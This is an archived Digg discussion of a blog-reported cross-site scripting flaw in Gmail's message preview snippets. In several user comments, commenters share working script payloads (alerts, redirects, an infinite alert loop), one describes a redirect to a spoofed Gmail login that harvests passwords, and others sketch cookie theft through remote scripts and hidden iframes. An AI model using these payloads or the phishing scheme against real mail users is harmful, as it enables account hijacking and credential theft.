digg

Facebook Connect Join Digg About

Vulnerability In Gmail allowing attackers to run code

ph3rny.blogspot.com If the preview snippet of a message in gmail contains javascript or html it will be executed.

Who dugg this? Made popular Mar 1, 2006

Digg DudeWhat is Digg?

Digg is a place for people to discover and share content from anywhere on the web. Digg surfaces the best stuff as submitted and voted on by the community. Take the Tour to learn more.

144 Comments

show profanity settings
expand all
  • ph3rny, on 10/12/2007, -0/+6It's my blog just so you know.

    Although you could consider it self promotion how else am I supposed to post something like this.
  • inactive, on 10/12/2007, -1/+7"Keep your blog spam off digg *****"

    Notice he posted "it's my blog just so you know.

    Although you could consider it self promotion how else am I supposed to post something like this."

    He discovered this, and posted it in the only form he could think of (as he mentioned), so until you think of a better way for him to have shared it, STFU...marked as spam while I'm at it.

    Anyway, I think they fixed it. I just made a fresh Yahoo account and emailed the exact code in the blog, and there was no alert to be seen.
  • mikechml, on 10/12/2007, -0/+5Seriously, why post it here?
    Why not just e-mail google directly and avoid the frenzy of phishing?
  • SSJemmett, on 10/12/2007, -0/+4Take it from me... DO NOT put "location.replace("http://www.yahoo.com");" in the message body unless you want to redirected to Yahoo every time you try to access your inbox. Basically, I can't access my email again until Google fixes this.
  • outerspaceapple, on 10/12/2007, -0/+3I bet you could include a .js file hosted remotely... then its any man's game
  • pinkfu, on 10/12/2007, -0/+2Why does everyone forget that Gmail is still beta?
  • ph3rny, on 10/12/2007, -0/+2Just to clear this up I did report this to google before putting this on digg...

    And yes it is fixed
  • ionut, on 10/12/2007, -0/+2Try something like
    document.location='http://www.cnn.com'
    instead of the alert. It's really great to see the redirection. And it's pretty difficult to go back to gmail. So beware.
  • wthulhu, on 08/29/2009, -0/+2The flaw still works, make sure you have a character BEFORE the < symbol, otherwise it will truncate it.
    SCRIPT SRC= - does work, which means this is really bad and can be pointed at a remote JS that has a lot more meat than the snipitts.
    Turning off snippets under Settings will stop this.
  • inactive, on 10/12/2007, -0/+2Totally amateurish security hole. Methinks the folks in google's ivory towers lack a bit of street smarts... Maybe they should consider hiring some "dumb" people too. :D
  • noamsml, on 10/12/2007, -1/+3eek, scary. In the meanwhile, all mails to me with the word "script" in them will be immediately archived and have the label "potentially dangerous" applied to it.
  • outerspaceapple, on 10/12/2007, -0/+1hahaha, I just pr4nk3d two of my friends with the following

    Subject: LOL
    Body: dude!-script-alert("Eddy h4x0r3d you! Tell him he's cool! :-D");-/script- crazy.

    It works like a charm from a yahoo online account.
  • sosbythefool, on 10/12/2007, -0/+1I redirected to a spoofed GMail login that when submitted stores the username/password. I'm being nice though and let them know I did this :)

    asd-script-window.location.href='http://tinyurl.com/zwxs2';-/script-asd
  • trogdoor, on 10/12/2007, -0/+1"I use gmail with outlook, am I still at risk?"
    no.
  • Patrick_, on 10/12/2007, -0/+1This is why I'd never use Google's payment system... at least at first. I think _every_ single Google release of some new product has had at _least_ one vulnerability. Think about it... Maybe Google should've just stuck with searching.
  • mikeon, on 10/12/2007, -0/+1Wouldn't turning off preview snippets in the settings stop this?
  • ph3rny, on 10/12/2007, -0/+1Has nothing to do with this... it was fixed well before 3/25
  • LewsTherin, on 10/12/2007, -0/+1If you're stupid enough to test with a redirect, you can fix it by disabling javascript in your browser, then deleting the e-mail.
  • Hoohoonick, on 10/12/2007, -0/+1great, tell the world :P
  • dognose, on 10/12/2007, -0/+1Haha. I wrote a cookie stealing script, which I tried w/ my gmail account. It works, but now I can't get into my gmail now, because it redirects to the cookie stealing site. doh!
  • a3r0, on 10/12/2007, -0/+1How can you not do anything malicious? You can steal the user's cookies and log into their Gmail account or forward them to a fake login page and take their password.
  • ZenWarrior, on 10/12/2007, -0/+1Great digg -- especially for a 14 y/o. Thanks!
  • tweeto, on 10/12/2007, -0/+1If you did manged to redirect your mail box and you just cant get in, just send your self 50 mails and youll be able to get in...
  • sosbythefool, on 10/12/2007, -0/+1Still working for me at 5:19PM Central Time.

    I sent some friends asdfwhile(true){alert('haha');}asdf
    No email for them. :)

    You can fix your email from something like this by:
    In Firefox, turning off Javascript.
    Go to GMail
    Choose to load the Basic HTML version (does not have the vulnerability)
    Delete the offending message.
    Turn Javascript back on.
  • trogdoor, on 10/12/2007, -0/+0digg stripped the code, what I wrote in the message (which didn't work) was:
    1{script}alert("test");{/script}1
    where { = < and } = >
  • Fredx, on 10/12/2007, -0/+0not the first, wont be the last ..


    someone say "Google OS" ?
  • inactive, on 10/12/2007, -0/+0Note: turning snippets off does eliminate the vulnerability in Gmail; not in google/ig though...
  • a3r0, on 10/12/2007, -0/+0It's not fixed yet. It was probably your email client escaping the symbols.
  • ThatsUnpossible, on 10/12/2007, -0/+0it's fixed. They're now escaping the < and > as expected to &lt; and &gt;
  • FuzzyOnion, on 10/12/2007, -0/+0I used the same code from the blog and while the alert didn't pop up, when I went to google.com, which I have set to use the personalized homepage, the page was all messed up. When I deleted the message and went back to the homepage, it was fixed.
  • beta1, on 10/12/2007, -0/+0thanx for the info i guess. And cool call "patrick_ " - "This is why I'd never use Google's payment system"

    haha
  • __J__, on 10/12/2007, -0/+0This is why gmail is still beta, I guess...
  • drew112588, on 10/12/2007, -0/+0Has anyone else gotten a message at the top of the gmail page saying that it is corrupt and that your firewall needs to be turned off.... hmmm
  • pkulak, on 10/12/2007, -0/+0Worked perfectly for me. That's crazy.
  • inactive, on 10/12/2007, -0/+0"why? because it's gmail. GOOGLE makes gmail. GOOGLE wouldn't do something so stupid. google is the greatest."

    Exactly. It's yahoo's fault for allowing people to send javascript in their emails.
  • outerspaceapple, on 10/12/2007, -0/+0yes, with a script src= javascript include, you could create an invisible iframe very easily and.... have phun?
  • ahmerhussain, on 10/12/2007, -0/+0"I use gmail with outlook, am I still at risk?"

    You are at risk for a lto more things b/c u use outlook. In my opinion the Gmail web interface is superior to outlook.
  • dognose, on 10/12/2007, -0/+0my inbox is still redirecting.
  • didit, on 10/12/2007, -0/+0>it's fixed. They're now escaping the < and > as expected to < and >

    not for me. but code doesn't work :o(
  • longman2g, on 10/12/2007, -0/+0I just tested it, it still works
  • tforcram, on 10/12/2007, -0/+0Ok, near as I can tell, if your email client uses the header Content-Type: text/html; and then doesn't escape the < and > characters (like yahoo), then it will run. Most client's will encode it, but even if all it did, this is still a gaping hole that anyone with a little smtp knowledge could take advantage of. Coupled with the easy access to gmail addresses from google pages and we've got a fine recipe for disaster here.
  • bobgb4, on 10/12/2007, -0/+0yeah this is not good... i tried and u can now put java code in messages
  • ozzloy, on 10/12/2007, -0/+0it worked for me for 2 messages, now it doesn't
  • SilverRocket, on 10/12/2007, -0/+0I can't seem to replicate it, but clearly this worked and was serious, so digg+++
  • jupo, on 10/12/2007, -0/+0Rather than a redirect try creating an iframe that sends GMail's cookie value to a server side script elsewhere. If this can be used to hijack a session then it's a nightmare. One would expect thought that the session is tied to an I.P address in which case it would be much more difficult to exploit. An even craftier approach would be to raise click events and extract desired email content from the interface's document, sending it elsewhere in the same fashion described above without requiring a valid session.
  • superbnerd, on 10/12/2007, -0/+0Worked for me the first time, didn't the second : On my own account.
  • subodhgupta, on 10/12/2007, -0/+0Still working at 1832 EST. :((
  • tforcram, on 10/12/2007, -0/+0Definately not fixed yet, it looks like it has something to do with the mime type that the mail client uses. Also it will only work the first time you load the inbox, as mentioned above a refresh won't work. This is kinda scary.
  • SP33DFR34K, on 10/12/2007, -0/+0It also works if u have gmail preview for Google IG..
  • Fetching more discussions...
    Show 51 - 100 of 146 discussions

  • Add a Comment

    Login or register to comment!
    Or, sign-in super fast with your Facebook account ...


© Digg Inc. 2009 — Content created and posted by Digg users is dedicated to the public domain | Terms of Use Updated | Privacy Policy
DIGG, DIGG IT, DUGG, DIGG THIS, Digg graphics, logos, designs, page headers, button icons, scripts, and other service names are the trademarks of Digg Inc.